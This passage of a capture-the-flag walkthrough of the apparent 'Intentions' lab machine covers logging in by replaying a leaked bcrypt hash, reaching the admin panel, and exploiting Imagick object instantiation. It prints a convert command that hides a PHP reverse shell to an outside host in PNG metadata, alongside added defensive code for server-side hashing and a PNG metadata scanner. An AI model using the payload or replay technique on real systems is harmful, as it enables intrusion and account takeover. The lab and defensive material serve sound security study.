X-XSRF-TOKEN: eyJpdiI6Ik5JMUlrNnRYUmk5OTlKMkpPaG1GekE9PSIsInZhbHVlIjoiMW9PTG5Zc3RSWTFzYW5EMGlTYjhML2pHUzY5M2VwZEk3UGoyVU1HVjRKWThuSE81R1ZvV2N2bHByYUkwWFljRHFOOEhMYXloUEkyL1ZFVzUrK0UzNWowQ09FYWtNa2tsL0piUFZDK2kzQmZVaVFtYldqYTJjRHJlUlZHUithUVIiLCJtYWMiOiJmNzEzYTgzMzk4N2I5OWVlYTFiYmZlOWNkMTYzZDNkYWM1ZWEzZDljMjE1NWNmZmIxMTliNmVmYTg3ZTcyZmQ1IiwidGFnIjoiIn0=
Content-Length: 102
Origin: http://10.10.11.220
Connection: close
Referer: http://10.10.11.220/
Cookie: XSRF-TOKEN=eyJpdiI6Ik5JMUlrNnRYUmk5OTlKMkpPaG1GekE9PSIsInZhbHVlIjoiMW9PTG5Zc3RSWTFzYW5EMGlTYjhML2pHUzY5M2VwZEk3UGoyVU1HVjRKWThuSE81R1ZvV2N2bHByYUkwWFljRHFOOEhMYXloUEkyL1ZFVzUrK0UzNWowQ09FYWtNa2tsL0piUFZDK2kzQmZVaVFtYldqYTJjRHJlUlZHUithUVIiLCJtYWMiOiJmNzEzYTgzMzk4N2I5OWVlYTFiYmZlOWNkMTYzZDNkYWM1ZWEzZDljMjE1NWNmZmIxMTliNmVmYTg3ZTcyZmQ1IiwidGFnIjoiIn0%3D; intentions_session=eyJpdiI6Ikp2K3dwZENPVEJ1Q29uWlNhcEZZR3c9PSIsInZhbHVlIjoibEN5clN5V0RPdml0cktmY2ZBSnVnN2RqOUJ2cC91OXUwWGg0d1BOTjRRcm1CeVRGbUROaVpaQm5CYTJLS1JEQU9TRVl6ZTlIanpnWTk3T1U2WTlCTUNib2p2Z0VLTDdMME5ncjRvQlB0Yk5UOXl2UlcxTkJMdkN2Q0UvaXhlQmEiLCJtYWMiOiI4NDdmNDk4NzE5ZTM4MjE4OTE5Nzc3ZGI3MWJkZDg1OTBhOWQ1NTg5NmRmM2ViMTcyYTlhOTE0Y2Y4OTc5Y2NkIiwidGFnIjoiIn0%3D; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJodHRwOi8vMTAuMTAuMTEuMjIwL2FwaS92MS9hdXRoL2xvZ2luIiwiaWF0IjoxNzE2MTg2MzI0LCJleHAiOjE3MTYyMDc5MjQsIm5iZiI6MTcxNjE4NjMyNCwianRpIjoiRGxFYUNjMlZvdzg1c1hwUCIsInN1YiI6IjI4IiwicHJ2IjoiMjNiZDVjODk0OWY2MDBhZGIzOWU3MDFjNDAwODcyZGI3YTU5NzZmNyJ9.dpINYnaakWdwUl6msv6Ww9CpAQutV4ayg7WJA7ZAir8

{"email":"steve@intentions.htb","hash":"$2y$10$M/g27T1kJcOpYOfPqQlI3.YfdLIwr3EWbzWOLfpoTtjpeMqpp4twa"}
```

It turns out we are able to get into `steve`'s account.
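The developer comment in `admin.js` argues that hashing client side protects users because "BCrypt is basically uncrackable". The login above shows why that reasoning fails: once the server accepts the client's hash verbatim, the stored hash is itself the credential, and anyone who reads the column (here through the SQLi) can log in without ever cracking it. The script below is an added example, not the application's code; it uses PBKDF2 from the standard library as a stand-in for bcrypt so that it runs without extra packages, and the user record and password are constructed. It contrasts the v2 design with a server-side design in which a leaked hash cannot be replayed.

```python
import hashlib
import hmac
import os

# A client-side scheme needs a salt the browser can derive, so it cannot be a server secret.
CLIENT_SALT = b"constructed-client-salt"


def client_side_hash(password):
    """Stand-in for the page's client-side BCrypt: a slow hash the browser could compute."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), CLIENT_SALT, 50_000).hex()


# --- the v2 design described in admin.js: the server stores and compares the client hash ---

def v2_register(store, email, password):
    store[email] = client_side_hash(password)


def v2_login(store, email, submitted_hash):
    """Accepts whatever arrives in the `hash` field and compares it to the stored column.
    The column is therefore a password-equivalent: reading it is as good as knowing the
    password, and no amount of bcrypt strength changes that."""
    stored = store.get(email)
    return stored is not None and hmac.compare_digest(stored.encode(), submitted_hash.encode())


# --- hardened design: the server applies its own salted slow hash to what it receives ---

def server_hash(secret, salt):
    return hashlib.pbkdf2_hmac("sha256", secret.encode(), salt, 100_000)


def fixed_register(store, email, password):
    """Stores a per-user random salt plus the server-side hash. If client-side hashing is
    kept for other reasons, the same applies with the client hash as `secret`: the server
    must hash again before storing, so the stored value never equals what the client sends."""
    salt = os.urandom(16)
    store[email] = {"salt": salt, "hash": server_hash(password, salt)}


def fixed_login(store, email, password):
    rec = store.get(email)
    if rec is None:
        return False
    return hmac.compare_digest(rec["hash"], server_hash(password, rec["salt"]))


def demo(email="steve@intentions.htb", password="constructed-password"):
    """Replays the value an attacker would read from the database against both designs."""
    v2, fixed = {}, {}
    v2_register(v2, email, password)
    fixed_register(fixed, email, password)
    leaked_v2 = v2[email]                       # what the SQLi hands the attacker in v2
    leaked_fixed = fixed[email]["hash"].hex()   # the equivalent column in the hardened design
    return {
        "v2_replay": v2_login(v2, email, leaked_v2),             # True: the hash is the credential
        "fixed_replay": fixed_login(fixed, email, leaked_fixed), # False: server re-hashes the input
        "fixed_password": fixed_login(fixed, email, password),   # True: only the password works
    }


if __name__ == "__main__":
    print(demo())
```

The comment also treats client-side hashing as a substitute for HTTPS. It is not: the hash travels over plain HTTP and is accepted as-is, so an observer captures a working credential exactly as they would a cleartext password. Transport protection has to come from TLS, and credential storage has to involve a server-side secret step.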

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2F6KZWKc5C7EyUAkSw1ip7%2Fimage.png?alt=media&#x26;token=a9a0c19f-629d-4e91-bd83-94495e6e04a0" alt=""><figcaption></figcaption></figure>

From there, we can go to the admin page.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2F8z8PWAb5nNx8YWI7O613%2Fimage.png?alt=media&#x26;token=137414e0-1b00-4c77-859e-4d0d78d2c81c" alt=""><figcaption></figcaption></figure>

In the admin page, we can see all the users and images that are stored.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FYTj7IMrEsamKYahBJwO9%2Fimage.png?alt=media&#x26;token=2ff4da0b-b863-40ef-b41a-f25b666d85ba" alt=""><figcaption></figcaption></figure>

We can see that the image editor they use is `imagick`.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2F7nqISnL9GbNSZdmAFGnd%2Fimage.png?alt=media&#x26;token=34fd7abd-c05d-47e0-88de-da428bc6d5d1" alt=""><figcaption></figcaption></figure>

When we open an image for editing, we can see the image's path.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2Fvia4sGukUuoX6Qt7FvxL%2Fimage.png?alt=media&#x26;token=2bd869e5-2818-469b-bd80-dd24e0e9b480" alt=""><figcaption></figcaption></figure>

When we modify the image's path, the application rejects it with a bad image path response.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2FOUI0heXnPsQ19hiYrKyy%2Fimage.png?alt=media&#x26;token=3c588938-d3d7-4b99-9fef-2ebf41566b1d" alt=""><figcaption></figcaption></figure>

### Imagick Vulnerability

{% embed url="https://swarm.ptsecurity.com/exploiting-arbitrary-object-instantiations/" %}

The exploit described above uses remote file inclusion to load PHP objects and achieve RCE. We can test whether the website is vulnerable to this attack.

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2Fe18ALgkJRhhpRBfBbaFZ%2Fimage.png?alt=media&#x26;token=328aa9f8-5825-445b-94d0-adf20d0e41ad" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2790417739-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FIXulVMkW3AbpCXfmoP1H%2Fuploads%2F62W2PmQEfQLqCSyPUvYB%2Fimage.png?alt=media&#x26;token=1264cd93-011d-45a8-962c-e09695db1677" alt=""><figcaption></figcaption></figure>

```bash
$ convert xc:red -set 'Copyright' '<?php system("bash -i >& /dev/tcp/10.10.14.2/4444 0>&1"); ?>' payload.png
```
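The `convert` command above hides PHP in an image's text metadata, which for PNG means a `tEXt`, `zTXt` or `iTXt` chunk. An upload handler that only checks the file's magic bytes or lets ImageMagick re-encode it will not notice. The Python scanner below is an added example, not part of the writeup or of the application: it walks the PNG chunk structure, verifies each CRC, decodes the three text chunk types and reports any PHP open tag. The `make_png` helper only exists to build constructed test fixtures in the same shape as the payload image, carrying a harmless marker string.

```python
import re
import struct
import zlib

PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"
TEXT_CHUNKS = {b"tEXt", b"zTXt", b"iTXt"}
# `<?php`, the short echo tag `<?=`, or a bare `<?` followed by whitespace. Requiring
# one of those avoids flagging `<?xpacket`, which legitimate XMP metadata starts with.
PHP_TAG = re.compile(rb"<\?(php\b|=|\s)", re.IGNORECASE)


def _chunk(ctype, data):
    """Serialise one PNG chunk: length, type, data, CRC over type+data."""
    crc = zlib.crc32(ctype + data) & 0xFFFFFFFF
    return struct.pack(">I", len(data)) + ctype + data + struct.pack(">I", crc)


def make_png(text_fields):
    """Constructed 1x1 red PNG carrying {keyword: text} pairs as tEXt chunks (test fixture)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)   # 1x1 pixel, 8-bit RGB
    idat = zlib.compress(b"\x00\xff\x00\x00")            # filter byte + one red pixel
    out = PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
    for keyword, text in text_fields.items():
        out += _chunk(b"tEXt", keyword.encode("latin-1") + b"\x00" + text.encode("latin-1"))
    return out + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def iter_chunks(data):
    """Yield (type, payload) for every chunk, checking the signature and each CRC."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG file")
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        end = pos + 12 + length
        if end > len(data):
            raise ValueError(f"truncated {ctype!r} chunk")
        payload = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:end])
        if zlib.crc32(ctype + payload) & 0xFFFFFFFF != crc:
            raise ValueError(f"bad CRC in {ctype!r} chunk")
        yield ctype, payload
        pos = end
        if ctype == b"IEND":
            break


def text_of(ctype, payload):
    """Return (keyword, text bytes) for a tEXt, zTXt or iTXt chunk."""
    keyword, _, rest = payload.partition(b"\x00")
    if ctype == b"tEXt":
        return keyword, rest
    if ctype == b"zTXt":
        return keyword, zlib.decompress(rest[1:])        # rest[0] is the compression method
    # iTXt: compression flag, compression method, language tag\0, translated keyword\0, text
    flag, rest = rest[0], rest[2:]
    _, _, rest = rest.partition(b"\x00")
    _, _, text = rest.partition(b"\x00")
    return keyword, zlib.decompress(text) if flag else text


def find_php_in_metadata(png_bytes):
    """Return [(chunk type, keyword, snippet)] for every text chunk containing a PHP tag."""
    findings = []
    for ctype, payload in iter_chunks(png_bytes):
        if ctype not in TEXT_CHUNKS:
            continue
        keyword, text = text_of(ctype, payload)
        match = PHP_TAG.search(text)
        if match:
            snippet = text[match.start():match.start() + 40].decode("latin-1", "replace")
            findings.append((ctype.decode(), keyword.decode("latin-1"), snippet))
    return findings


if __name__ == "__main__":
    # Constructed uploads: one with a harmless PHP marker in Copyright, one clean.
    suspicious = make_png({"Copyright": '<?php echo "constructed marker"; ?>'})
    clean = make_png({"Copyright": "CC BY 4.0"})
    print(find_php_in_metadata(suspicious))   # [('tEXt', 'Copyright', '<?php echo "constructed marker"; ?>')]
    print(find_php_in_metadata(clean))        # []
```

A scan like this belongs at upload time, before the file is handed to ImageMagick. It is a detection aid, not the fix: the image only becomes dangerous because the application lets user-controlled paths reach `Imagick`, so the uploaded files also need to live where PHP can never include or execute them.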
